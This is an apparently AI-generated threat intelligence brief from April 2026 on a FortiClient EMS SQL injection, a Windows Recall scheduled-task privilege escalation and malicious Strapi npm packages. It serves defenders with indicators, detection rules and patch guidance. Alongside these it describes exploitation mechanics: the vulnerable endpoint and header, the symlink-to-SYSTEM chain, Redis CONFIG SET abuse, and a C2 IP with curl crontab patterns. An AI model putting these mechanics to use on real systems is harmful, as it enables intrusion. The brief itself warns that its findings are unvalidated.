Cyber Threat Brief — April 14 2026
⚠️ This report is AI-generated. Always validate findings.
1. Fortinet FortiClient EMS Pre-Auth SQL Injection — CVE-2026-21643
TL;DR: CISA added CVE-2026-21643 (CVSS 9.3) to KEV on April 13 — a pre-auth SQLi in FortiClient EMS 7.4.4 multi-tenant deployments via the Site HTTP header on /api/v1/init_consts. Chainable with existing exploit tooling to full unauth RCE; ~1,000 instances exposed on Shodan.
What’s New:
- KEV addition April 13 2026; federal mitigation deadline May 4. Patch: upgrade 7.4.4 → 7.4.5 (or later).
- Root cause: 7.4.4 refactor replaced parameterized queries with raw string interpolation; tenant identifier passed directly into SQL before any auth check (Bishop Fox).
- Exploitation: unauth GET to
/api/v1/init_constswith maliciousSite:header → DB error messages returned (blind + error-based), no lockout → rapid tenant DB extraction. - Scope: only 7.4.4 multi-tenant mode; single-site deployments unaffected. PoC public (Bishop Fox write-up includes payload structure).
- Active in-the-wild exploitation reported since late March (Help Net, Bleeping, Arctic Wolf).
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
HTTP request to /api/v1/init_consts with non-standard Site header | URI/Header | T1190 | WAF, reverse proxy, EMS access logs | Alert on any unauth hit — endpoint is rarely touched legitimately |
Site: header containing SQL metacharacters (', ", --, /*, UNION, SLEEP, 0x) | Payload signature | T1190 | WAF, NGFW, access logs | Block and alert |
Burst of 500-class responses from /api/v1/init_consts to a single source | Error anomaly | T1190 | EMS app logs, access logs | Hunt — blind SQLi probing |
| FortiClient EMS service account performing unusual SELECT/UNION against non-tenant tables | DB behavior | T1213 | PostgreSQL/MSSQL query logs | Alert on schema discovery queries from web tier |
| Outbound connections from EMS server to non-update / non-Fortinet destinations | Network | T1071.001 | Firewall, Zeek conn.log | Alert — post-exploit beaconing |
FortiClient EMS version == 7.4.4 with multitenancy=true | Asset attribute | T1190 | CMDB, vuln scanner, EMS config | Prioritize patch |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None specific | Need: web datamodel search for uri_path="/api/v1/init_consts" with Site header containing SQL tokens; spike detection on EMS 5xx rate |
| Elastic | Generic “SQL Injection Attempt” (web) | Gap: no EMS-specific rule pinning /api/v1/init_consts or Site header abuse |
| Sigma | web_cve_2024_*_forticlient_ems.yml (CVE-2024-48788 only) | Need: new rule keyed on cs-uri-stem=/api/v1/init_consts + suspicious Site header values |
Sources: CISA KEV Alert — Apr 13 · Bishop Fox writeup · Arctic Wolf · Help Net Security · SOC Prime
2. Windows Host Process for Tasks LPE — CVE-2025-60710
TL;DR: CISA added CVE-2025-60710 to KEV on April 13; public PoC on GitHub drives SYSTEM-level arbitrary folder delete via symlink abuse of the WindowsAI\Recall\PolicyConfiguration scheduled task on Windows 11 24H2/25H2 and Server 2025. Patched in MS October 2025 rollup.
What’s New:
- KEV addition April 13 2026 (federal mitigation due May 4); confirmed in-the-wild exploitation.
- PoC: github.com/redpack-kr/CVE-2025-60710; 4 total public PoCs tracked by PoC-in-GitHub.
- Mechanic:
taskhostw.exerunning as SYSTEM deletes%LOCALAPPDATA%\CoreAIPlatform.00\UKP\*without validating symlinks → TOCTOU/link-follow → arbitrary folder delete as SYSTEM → convert to EoP via standard delete-to-SYSTEM primitives (e.g., AVD/MSI rollback tricks). - Trigger:
WnfStateChangeTrigger RecallPolicyCheckUpdateTrigger— attacker can force task execution from a low-priv context; no reboot required. - Affected: Win11 24H2/25H2 and Windows Server 2025 (including Server Core). Patched KB5066835 / Oct 14 2025 Patch Tuesday.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
Junction/symlink creation under %LOCALAPPDATA%\CoreAIPlatform.00\UKP | Filesystem | T1068 | Sysmon EID 11 (FileCreate), EDR file telemetry | Alert — this directory should not normally contain reparse points |
taskhostw.exe deleting outside %LOCALAPPDATA% (e.g., C:\Windows\System32\*, Program Files\*) | Process-File | T1068 | EDR file-delete events, Sysmon EID 26 | High-fidelity alert — indicates successful symlink traversal |
Scheduled task start: \Microsoft\Windows\WindowsAI\Recall\PolicyConfiguration under non-admin user SID | Task activity | T1053.005 | Windows EID 4698/4702, Security 4624 correlation | Hunt — task-start from unusual WNF trigger under low-priv user |
Registry/WNF state change: WNF_AI_RECALL_POLICY_CHECK_UPDATE from non-system process | WNF | T1068 | ETW Microsoft-Windows-Kernel-WNF | Hunt — rarely written outside system services |
New SYSTEM-context process spawned shortly after taskhostw.exe file-delete burst | Correlation | T1068 | EDR, Sysmon EID 1, EID 23 | Alert — chained EoP |
| KB5066835 (or later) not installed on Win11 24H2/25H2 / Server 2025 | Patch state | T1068 | MECM, Tenable, Defender TVM | Prioritize patch (KEV) |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Suspicious Scheduled Task Runtime (generic) | Need: rule for taskhostw.exe file deletes outside per-user profile paths; junction creation under CoreAIPlatform.00 |
| Elastic | Privilege Escalation via Windows Scheduled Task (generic) | Gap: no Recall/CoreAIPlatform-specific logic; needs FileCreate rule on reparse points in that directory |
| Sigma | proc_creation_win_taskhostw_susp_* (partial, unrelated) | Need: new file_event_win_taskhostw_unusual_delete.yml and file_event_win_coreai_symlink.yml |
Sources: CISA KEV Alert — Apr 13 · NVD — CVE-2025-60710 · Rapid7 DB · PoC — redpack-kr · SecurityOnline PoC writeup
3. Guardarian-Targeted Strapi npm Supply-Chain Attack
TL;DR: A coordinated campaign planted 36 malicious npm packages impersonating Strapi CMS plugins; postinstall scripts drop a persistent Node C2 agent, exploit local Redis/PostgreSQL, and surgically target the Guardarian crypto-exchange. Active since early April 2026; latest variants are fileless (node -e).
What’s New:
- 36 packages across 4 npm accounts —
umarbek1233,kekylf12,tikeqemif26,umar_bektembiev1— all v3.6.8, identical 3-file layout; published late March → detected Apr 3 (Safedep). - Sample names:
strapi-plugin-cron,strapi-plugin-events,strapi-plugin-config,strapi-plugin-server,strapi-plugin-database,strapi-plugin-core,strapi-plugin-hooks,strapi-plugin-monitor,strapi-plugin-seed. - Execution:
postinstallhook → filesystem-wide secret search → writes/tmp/.node_gc.js(detached background) + installs crontab to respawn every minute. - Capability: Redis RCE (via
CONFIG SET dir/SLAVEOFclassic), PostgreSQL credential theft, PHP webshell drop under uploads, Guardarian-specific hostname + credential targeting hardcoded. - Variant evolution: v3.6.9 removed disk artifact — entire agent passed as inline
node -e '<string>'; only network and process IOCs remain.
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
144.31.107.231 | C2 IP | T1071.001 | Firewall, Zeek conn.log, proxy | Block and retro-hunt 90 days |
/tmp/.node_gc.js, /tmp/vps_shell.sh on any Linux/macOS dev or CI host | File artifact | T1059.007 / T1543 | osquery, EDR, auditd | Alert and remove; run IR |
Crontab entries referencing node_gc, curl .*144\.31\.107\.231, or /tmp/.node_gc.js | Persistence | T1053.003 | auditd, osquery crontab table, EDR | High-fidelity alert |
| npm package installs where name matches `^strapi-plugin-(cron | events | config | server | database |
npm publisher accounts: umarbek1233, kekylf12, tikeqemif26, umar_bektembiev1 | Attribution | T1195.002 | npm audit, internal registry mirror logs | Blocklist in internal mirror/proxy |
Detached node -e processes with long inline scripts under non-interactive user | Process | T1059.007 | EDR, Sysmon-for-Linux EID 1, auditd execve | Alert — v3.6.9 fileless variant |
Redis CONFIG SET dir / SLAVEOF from local or same-host client on dev/CI boxes | App behavior | T1210 | Redis command logs, Falco | Alert |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | Linux Auditd Add User To Privileged Group (generic), npm install Suspicious Postinstall (community) | Need: package-name blocklist search, cron file modifications referencing /tmp/.node_gc.js, conn.log to 144.31.107.231 |
| Elastic | Suspicious Execution via Scheduled Task (Linux) (generic) | Gap: no rule for postinstall-spawned node processes with detached long inline scripts |
| Sigma | lnx_auditd_susp_cron.yml, lnx_auditd_node_e_suspicious.yml (partial) | Need: lnx_npm_postinstall_strapi_malware.yml keyed on package-name + cron + node_gc file path |
Sources: Safedep research · The Hacker News · SecurityWeek — Guardarian targeting · Cybersecurity News
Status Updates
- CVE-2026-34621 (Adobe Acrobat/Reader): Added to CISA KEV April 13; federal mitigation deadline May 4. No new IOCs beyond April 13 brief. Original coverage.
- CVE-2023-21529 (Microsoft Exchange): Added to KEV April 13 as part of Storm-1175’s n-day rotation (Microsoft blog, April 6). Apply Feb 2023 SU if any Exchange server remains unpatched. Storm-1175 coverage.
- CVE-2020-9715 / CVE-2012-1854 / CVE-2023-36424: Older flaws added to KEV April 13 (Adobe Acrobat UAF, MS VBA insecure library load, Windows OOB read). Confirm patched on all endpoints; no new detection content required.